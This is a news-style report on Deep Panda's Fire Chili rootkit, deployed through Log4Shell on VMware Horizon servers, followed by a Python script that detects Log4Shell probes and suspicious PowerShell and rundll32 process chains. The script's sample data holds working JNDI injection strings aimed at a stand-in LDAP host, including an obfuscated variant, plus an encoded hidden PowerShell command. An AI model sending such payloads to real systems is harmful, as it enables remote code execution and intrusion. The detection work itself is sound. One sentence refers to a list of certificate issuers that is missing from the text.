A new rootkit named Fire Chili has been deployed on VMware Horizon servers by the Chinese hacking group Deep Panda, which used the Log4Shell exploit to get in and steal sensitive data from the targeted systems.

Using a certificate issued by the following departments, the rootkit evades detection by AV tools:

Here is what the security researchers at Fortinet’s FortiGuard Labs, Rotem Sde-Or and Eliran Voronovitch, stated:

“The nature of targeting was opportunistic insofar that multiple infections in several countries and various sectors occurred on the same dates.”

The Chinese cyber-espionage group “Deep Panda” is one of the most notorious APT groups; it has been active for several years and primarily conducts cyber-espionage operations. In 2017, the FBI arrested one of the members of this Chinese APT group for exploiting three zero-day vulnerabilities, and the investigation is still ongoing.

On reviewing customer alerts and telemetry, the researchers discovered several instances of Log4Shell being exploited against vulnerable VMware Horizon servers to gain access to victim networks. The attack chain involved downloading a chain of scripts, executing a malicious DLL, and launching a PowerShell process.
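The chain described above (a Log4Shell request reaching a Horizon server, a PowerShell process, downloaded scripts, a DLL) leaves traces in two places a defender already collects: the web-request log and process-creation telemetry. The following detection logic is an added example written for this page; it is not code from the article, from Fortinet, or from Deep Panda's tooling. The parent-process name `ws_TomcatService.exe`, the Sysmon-like event shape, the host name and the IP addresses are assumptions and constructed sample data, not facts taken from the article.

```python
import ntpath
import re
from dataclasses import dataclass

# --- Log4Shell probes in request logs -----------------------------------------
# Attackers hide "${jndi:" behind Log4j lookups such as ${lower:j} or the
# default-value form ${::-j}; resolve those before matching.
CASE_LOOKUP = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)
DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")
JNDI_LOOKUP = re.compile(r"\$\{jndi:", re.IGNORECASE)


def normalize_log4j(text: str, max_rounds: int = 10) -> str:
    """Resolve ${lower:x}, ${upper:x} and ${...:-x} lookups, innermost first."""
    for _ in range(max_rounds):
        new = CASE_LOOKUP.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper(),
            text,
        )
        new = DEFAULT_LOOKUP.sub(lambda m: m.group(1), new)
        if new == text:
            break
        text = new
    return text


def is_log4shell_probe(text: str) -> bool:
    """True when the (de-obfuscated) text contains a JNDI lookup."""
    return JNDI_LOOKUP.search(normalize_log4j(text)) is not None


# --- Process-creation telemetry -----------------------------------------------
@dataclass
class ProcessEvent:
    host: str
    parent_image: str
    image: str
    command_line: str


# ASSUMPTION: the Horizon Tomcat service binary is the parent that Log4Shell
# code execution lands in; this name is not taken from the article.
HORIZON_SERVICE_PARENTS = {"ws_tomcatservice.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
ENCODED_FLAG = re.compile(r"(?:^|\s)-e(?:c|nc|ncodedcommand)?(?=\s|$)")
DOWNLOAD_CRADLE = re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biex\b|invoke-expression")


def classify_process_event(ev: ProcessEvent) -> list[str]:
    """Return the reasons an event looks like the Horizon -> PowerShell -> DLL chain."""
    parent = ntpath.basename(ev.parent_image).lower()
    child = ntpath.basename(ev.image).lower()
    cmd = ev.command_line.lower()
    reasons = []
    if parent in HORIZON_SERVICE_PARENTS and child in SCRIPT_HOSTS:
        reasons.append("script host spawned by Horizon Tomcat service")
    if child in {"powershell.exe", "pwsh.exe"} and ENCODED_FLAG.search(cmd):
        reasons.append("encoded PowerShell command line")
    if DOWNLOAD_CRADLE.search(cmd):
        reasons.append("download cradle in command line")
    if child == "rundll32.exe" and parent in SCRIPT_HOSTS:
        reasons.append("DLL executed via rundll32 from a script host")
    return reasons


def scan(http_lines, proc_events) -> list[dict]:
    """Run both detections and return one finding per suspicious line or event."""
    findings = []
    for line in http_lines:
        if is_log4shell_probe(line):
            findings.append({"source": "http", "reason": "Log4Shell JNDI lookup", "line": line})
    for ev in proc_events:
        reasons = classify_process_event(ev)
        if reasons:
            findings.append({"source": "process", "host": ev.host, "image": ev.image, "reasons": reasons})
    return findings


# Constructed sample data: documentation IP range, fictitious host name.
HTTP_LOG_LINES = [
    '10.0.0.5 - - [02/Jan/2022:10:15:02 +0000] "GET /portal/ HTTP/1.1" 200 "-" "Mozilla/5.0 (Windows NT 10.0)"',
    '10.0.0.9 - - [02/Jan/2022:10:16:44 +0000] "GET /portal/ HTTP/1.1" 200 "-" "${jndi:ldap://198.51.100.20:1389/a}"',
    '10.0.0.9 - - [02/Jan/2022:10:16:45 +0000] "GET /portal/ HTTP/1.1" 200 "-" "${${lower:j}ndi:${lower:l}dap://198.51.100.20:1389/a}"',
]
PROC_EVENTS = [
    ProcessEvent("horizon-cs01", r"C:\Program Files\VMware\VMware View\Server\bin\ws_TomcatService.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -nop -w hidden -enc QQBCAEMA"),
    ProcessEvent("horizon-cs01", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"C:\Windows\System32\rundll32.exe", r"rundll32.exe C:\Users\Public\x.dll,Start"),
    ProcessEvent("horizon-cs01", r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell.exe Get-Date"),
]

if __name__ == "__main__":
    for finding in scan(HTTP_LOG_LINES, PROC_EVENTS):
        print(finding)
```

The request-log check de-obfuscates the nested lookups first, because a plain `${jndi:` grep misses the `${lower:j}` and `${::-j}` variants that were common in the wild; the process-side check keys on the parent/child relationship rather than on any file hash, so it still fires when the scripts and DLL change.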